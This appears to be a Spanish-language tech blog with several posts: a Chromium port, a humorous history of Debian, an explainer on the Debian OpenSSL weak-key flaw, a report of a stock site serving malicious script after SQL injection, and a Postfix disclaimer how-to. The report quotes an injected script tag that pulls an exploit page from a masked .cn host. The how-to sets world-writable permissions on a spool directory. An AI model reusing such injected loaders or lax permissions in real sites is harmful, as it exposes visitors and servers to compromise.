La gran ventaja de que liberes el código de un proyecto con la licencia adecuada es que cualquiera puede ampliar la funcionalidad, portabilidad o incluso compilarlo para otras plataformas…

El CEO de  Codeweavers decidió arreglar un poco la situación que Google creó el 2 de septiembre, sólo existía Chrome para Windows. Así que el 4 de septiembre se pusieron manos a la obra y en 11 días, consiguieron portar Chrome a Linux y a Mac. La verdad es un logro y un avance para todos.

Más información en este link. Dónde también explican como instalar Flash en Chromium.

La descarga se puede hacer desde los servidores de Codeweavers.

Google Chrome para Apple Mac OS X:
1. CrossOver Chromium for Apple Mac OS X.

Google Chrome para Linux:
1. CrossOver Chromium for Ubuntu and Debian (32 bit).
2. CrossOver Chromium for Ubuntu and Debian (64 bit).
3. CrossOver Chromium for Red Hat, Mandriva, and Suse.
4. CrossOver Chromium for all other Linux distros.

La verdad tanto ubuntero suelto en este blog empieza a oler mal, estarán recibiendo cheques por la colaboración???

Como no tengo otra cosa mejor que hacer (salvo estudiar para el examen de BD2) hablaré un poco de…

DEBIAN

Pero claro para empezar a hablar de Debian tengo que hablar de muchas frikadas… Así que empecemos a remontarnos en las arenas del tiempo…

Allá por el año 480 adC nace un muchacho griego, este jovenzuelo sin saberlo será el primero de muchos que abrirán el camino de Debian. Llegado a la madurez, nuestro ciudadano hasta ahora anónimo; se dedicará a la escultura (además de la pintura y la arquitectura) siendo conocido como el creador de las estatuas de Atenea Partenos y de Zeus en Olimpia. Obviamente me estoy refifiendo a Fidias. Uno de los pocos que ha conseguido estar en el Top 7 de las Maravillas del Mundo. Gracias a sus insignes y majestuosas obras, hoy día, en su honor bautizamos con una letra del alfabeto griego Φ (fi) a un pequeño y alocado número…

Sí me refiero a la sección áurea, sí, ese número categorizado como irracional, números conocidos desde que Hipaso de Metaponto rompió el cisma de su época de que con los racionales había de sobra para explicarlo todo…

Esta sección o proporción o razón áurea ha estado siempre ligada a la arquitectura, arte, biología, música, matemáticas… Y su existencia ha tenido que ver con Debian.

Aunque no ha sido la única. Han hecho falta más ocurrencias a lo largo de los siglos.

Otra ocurrencia a la que rendiré un pequeño homenaje, fue Ada Augusta Byron, más conocida como lady Ada Augusta Byron King, condesa de Lovelace. Creadora de la definión de subrutina, mediante la cuál le mostró a su colega Babbage cómo calcular los número de Bernoulli utilizando su máquina analítica. Gracias a ella y otros muchos se fue poco a poco creando el concepto de friki… Perdón, perdón, de informático

En pleno siglo XX después de que célebres mentes como: Alan M Turing, Dijkstra, Tanenbaum, Schneier, Ritchie, Kahn, Cerf, Knuth y muchos otros hubieran ido perfilando la cienca de la computación… Un estudiante de la Universidad de Purdue, decidió usar una parte del nombre de su esposa y parte de su nombre para un proyecto que estaba iniciando, empaquetar el software de una distribución Linux, así nació Debian, gracias a Ian Murdock y a Deb (su esposa).

Ya tenemos la sección áurea, el nombre de la distribución, pero nos falta algo… Sí gente, nuestro queridísimo Steve Jobs también tuve que ver algo en la creación de Debian. En 1986 después de algunos vaivenes personales y empresariales le compró una pequeña compañía a Lucasfilm llamada The Graphics Group, para más tarde cambiarle el nombre a Pixar.

Esta nueva compañía se dedicaba a la animación gráfica, es más tenían contratado a John Lasseter, el cuál estaba trabajando en un proyecto llamado Toy Story, sin el cuál nuestra distro favorita nunca existiría pues todos los nombres de versión han sido extraídos de la lista de personajes de Toy Story.

Es más según las malas lenguas , después del éxito de Debian y en previsión de que aún saliendo una nueva distribución cada 5 Ubuntus, 12 Red Hat y 10 Suses, las películas de Toy Story II y Toy Story III fueron creadas para que nuestra distro favorita no se quede sin nombres en muchos años.

Otro día hablaré de por qué tenemos un contrato social, un manifiesto y una comadreja helada como navegador…

Este artículo lo creo para intentar reunir toda la información relacionada con el último grave fallo de seguridad de Debian, obviamente en español, y por supuesto que desde el mismo día que se publicó el fallo, nuestros servidores empezaron a pasar por el aro y se regeneraron todas las putas claves ssl… Correo, Web, ssh, vamos trabajo a saco para quienes tengan muchos sitios; nosotros para nuestra desgracia somos muchos para pocas máquinas…

Primero de todo el aviso de fallo de seguridad de Debian que abrió la caja de los truenos… En él más o menos nos comentan que el generador de números aleatorios de openssl es predecible… El descubridor, Luciano Bello, revisando código de los fuentes de Debian concretamente el código de openssl; comprobó que no se estaba generando mucha entropía al crear las claves ssl. Y eso en qué nos afecta.

Pues muy sencillo; primero comentar que este pequeño cambio pedido por valgrind ha sido el causante de desatar una tormenta perfecta. Como se puede apreciar aquí todo se inició por el uso de una zona de memoria no inicializada como base para aumentar la entropía a la hora de generar claves ssl. Los de Valgrind se quejaban de que les aparecían demasiados warnings (obviamente este #ifndef PURIFY tiene algo que ver, es del debugger de IBM) y no les parecía correcto por tanto se realizó una pregunta de si comentando esas líneas pasaba algo y se llevó a cabo el cambio.

MD_Update(&m,buf,j);
	[ .. ]
MD_Update(&m,buf,j); /* purify complains */

Una vez realizado el cambio, el proceso de OpenSSL PRNG dejó de obtener una fuente de entropía y se redujo el número de posibles semillas para generar operaciones PRNG a 32768, que es por defecto el número de proceso más alto que genera el sistema. Valor por cierto increíblemente pequeño para algo que necesita mucha entropía, debido a la cantidad de semillas que se suelen generar en un servidor. Para aquellos que quieran profundizar más, esta explicación es bastante completa (english).

Como una imagen vale más que mil palabras dos tiras cómicas son las que mejor definen el resultado de ese pequeño cambio.

Una vez evaluado el fallo y corregido; vinieron los daños colaterales inherentes al fallo.

Todo programa relacionado con openssl está en entredicho, si se habían generado las claves ssl con etch, o algún sistema posterior. Sí, la vieja estable Sarge no está afectada, siempre y cuando las claves se hubieran generado con ella y no se hayan actualizado al hacer el upgrade a Etch. La primera versión vulnerable es la 0.9.8c-1 del 2006-09-17. Los daños se empezaron a extender a través de todo el sistema: SSH keys, OpenVPN keys, DNSSEC keys, certificados X.509 y claves de sesión para SSL/TLS…

En Etch (actual versión estable) el primer paquete correcto es la versión 0.9.8c-4etch3, que obviamente se recomienda instalar antes que respirar. Sid/Lenny tiene la versión 0.9.8g-9, están con la misma porque aún no estamos en frozen.

Por tanto qué hacer si tenemos este problema… muy sencillo en el caso de un sólo servidor ssh en el que no tengamos la entrada via clave sin contraseña:

apt-get update
apt-get upgrade
rm /etc/ssh/ssh_host_*
dpkg-reconfigure -plow openssh-server

Obviamente en el caso de que sólo usemos el ssh como cliente lo único que nos aparecerá es algo parecido a esto:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA1 host key has just been changed.
The fingerprint for the RSA1 key sent by the remote host is
f3:cd:d9:fa:c4:c8:b2:3b:68:c5:38:4e:d4:b1:42:4f.
Please contact your system administrator.

Que viene a decirnos que el administrador del sitio al que nos conectábamos ya ha regenerado la clave problemática…

En el caso de que sí tengamos la clave exportada para poder entrar en ssh remoto sin la contraseña tenemos una problema grave, pues 2^15 intento (32768), son muy pocos y como bien comentan en Phrack esto no le lleva a alguien que sepa lo que hace más de 20 minutos, problema que algún script kiddie podría darnos un susto.

Todo esto ha generado una oleada de cancelaciones de claves: Gnome, Debian, … Muchos grandes proyectos han tenido que cerrar los accesos hasta que los usuarios no envíen una clave que sí sea válida.

Además se ha preparado una Wiki Debian para ayudar a los usuarios realizar todos los pasos correctos a la hora de asegurar sus sistemas. También han puesto un nuevo programa ssh-vulnkey para poder testear la debilidad de nuestras claves.

A estas alturas existen miles de referencias en Google, yo las que he encontrado interesantes son las siguiente (lo peor es que están en inglés):

Este http://etbe.coker.com.au/2008/05/18/debian-ssh-problems/ es el blog de Russell Coker la información más interesante la he encontrado aquí. Habla de la gente de Phrack, del artículo de Metasploit dónde están las viñetas puestas en esta página y más información sobre el tema. La saca de oxtias que se ha repartido la peña en Slasdot y al final la explicación matemática de Steinar H. Gunderson de lo mejorcito.

Para los que prefieran el español dejo estos blogs KBglob y 120% Linux.

Desde luego que desfachatez, he intentado acceder a la página de Bolsa a la que siempre me conecto para ver si ya se había hundido el planeta y me encuentro que me están intentando meter un troyano…

Por lo que sé la página de xXx.com,ha sufrido una inyección SQL y está infectando usuarios descuidados. El problema reside en el listado de su Ranking Ibex, todos los valores presentes han sufrido una pequeña modificación y en vez de mostrar sólo el nombre y un enlace al valor, están enviando el siguiente script a todos los usuarios: <script src=http://www.w<script src=http://www.******.cn/m.js></script>

Es posible que estén infectando a todos los usuarios que usen explorer 5, 6 y 7 y no tengan parcheado su Windows XP SP2, 2003 SP1, 2003, 2000 SP4. Por lo que he leído el fallo es de carácter grave. En la página del National Vulnerability Database explican algo más sobre el fallo y sus consecuencias. El tag es CVE-2007-0024.

Ese script lo que hace es la carga de la página http://www.***.cn/07004.htm, que nos intentan meter un shellcode via este schemas-microsoft-com:vml.

En mi caso fue el antivirus (Avast) el que me dijo que se intentaba ejecutar un

En la página de F-Secure tienen más información.

Inauguramos la sección Howto’s con un manual para implementar un disclaimer en un servidor de correo Postfix. El manual está orientado para usuarios avanzados, no por la complejidad que entraña la operación en sí, sino porque partimos de la base que ya tenemos un servidor de correo Postfix completamente operativo. En próximas entregas os explicaremos como instalar y configurar dicho servidor.

¿Que es un disclaimer?

Un disclaimer es un texto añadido al final de los mensajes de correo que normalmente contiene claúsulas legales de privacidad y/o información de la empresa desde donde se ha enviado el correo, como “Este es un mensaje privado…”

¿Y para que sirve?

Pues básicamente para nada. Suelen implementarlo grandes corporaciones y su única finalidad es acojonar un poco a posibles hackers con rollos legales.

Manual implementación de un disclaimer en Postfix

Este manual está centrado en distribuciones Debian, pero es perfectamente aplicable a cualquier plataforma GNU/Linux. Sin más preámbulos, vamos manos a la obra.

1º Instalación altermime

Altermime es un pequeño programa que nos permite insertar, modificar y borrar mensajes de correo en formato MIME. Lo instalamos como root:

apt-get install altermime

2º Creación del script

Dentro del directorio de Postfix creamos la carpeta “disclaimer”

mkdir /etc/postfix/disclaimer

Y dentro de dicha carpeta creamos el fichero add_disclaimer.sh

touch /etc/postfix/disclaimer/add_disclaimer.sh

Este fichero contendrá lo siguiente:

———————————————————————————————————————-

#!/bin/sh
#Las siguientes variables dependen de tu sistema
ALTERMIME=/usr/bin/altermime
ALTERMIME_DIR=/var/spool/altermime
SENDMAIL=”/usr/sbin/sendmail -G -i”
MIDOMINIO=@midominio.com           #el dominio de tu servidor de correo
TEMPFAIL=75
UNAVAILABLE=69
cd $ALTERMIME_DIR || { echo $ALTERMIME_DIR does not exist; exit $TEMPFAIL; }
trap “rm -f in.$$” 0 1 2 3 15
cat >in.$$
case “$2″ in
*$MIDOMINIO*)         #ficheros donde tengas el texto del disclaimer
$ALTERMIME –input=in.$$ \
–disclaimer=/etc/postfix/disclaimer/disclaimer_txt.txt \
–disclaimer-html=/etc/postfix/disclaimer/disclaimer_html.txt \
–xheader=”X-Copyrighted-Material: MI EMPRESA S.L.” || \
{ echo Message content rejected; exit $UNAVAILABLE; }
esac
$SENDMAIL “$@” <in.$$
exit $?

————————————————————————————————————————–

3º Creación de los ficheros que contendrán el mensaje del disclaimer

Dentro del mismo directorio creamos los ficheros disclaimer_txt.txt y disclaimer_html.txt

touch /etc/postfix/disclaimer/disclaimer_txt.txt

touch /etc/postfix/disclaimer/disclaimer_html.txt

Y los editamos con el mensaje que queramos que contenga nuestro disclaimer.

4º Crear directorio /var/spool/altermime

mkdir /var/spool/altermime/

5º Crear usuario disclaimer y aplicar permisos

useradd disclaimer -c “Usuario para disclaimer” -d /dev/null -s /bin/sh

chown root.disclaimer -R /etc/postfix/disclaimer

chmod 770 -R /etc/postfix/disclaimer

chmod 777 -R /var/spool/altermime

6º Editar fichero master.cf

Por último sólo nos queda editar el fichero /etc/postfix/master.cf

Normalmente el fichero comienza con la siguiente línea:

smtp      inet  n       -       -       -       -       smtpd

Justo a continuación le añadimos lo siguiente:

-o content_filter=disclaimer

disclaimer unix -       n       n       -       -       pipe
flags=Rq    user=disclaimer argv=/etc/postfix/disclaimer/add_disclaimer.sh -f $sender $recipient

De tal forma que el comienzo de nuestro fichero debería ser:

smtp      inet  n       -       -       -       -       smtpd
-o content_filter=disclaimer

disclaimer unix -       n       n       -       -       pipe
flags=Rq    user=disclaimer argv=/etc/postfix/disclaimer/add_disclaimer.sh -f $sender $recipient

Sólo nos quedaría reiniciar Postfix:

/etc/init.d/postfix restart

Y si probamos a enviar un correo veríamos que al final del mensaje nos ha añadido el disclaimer.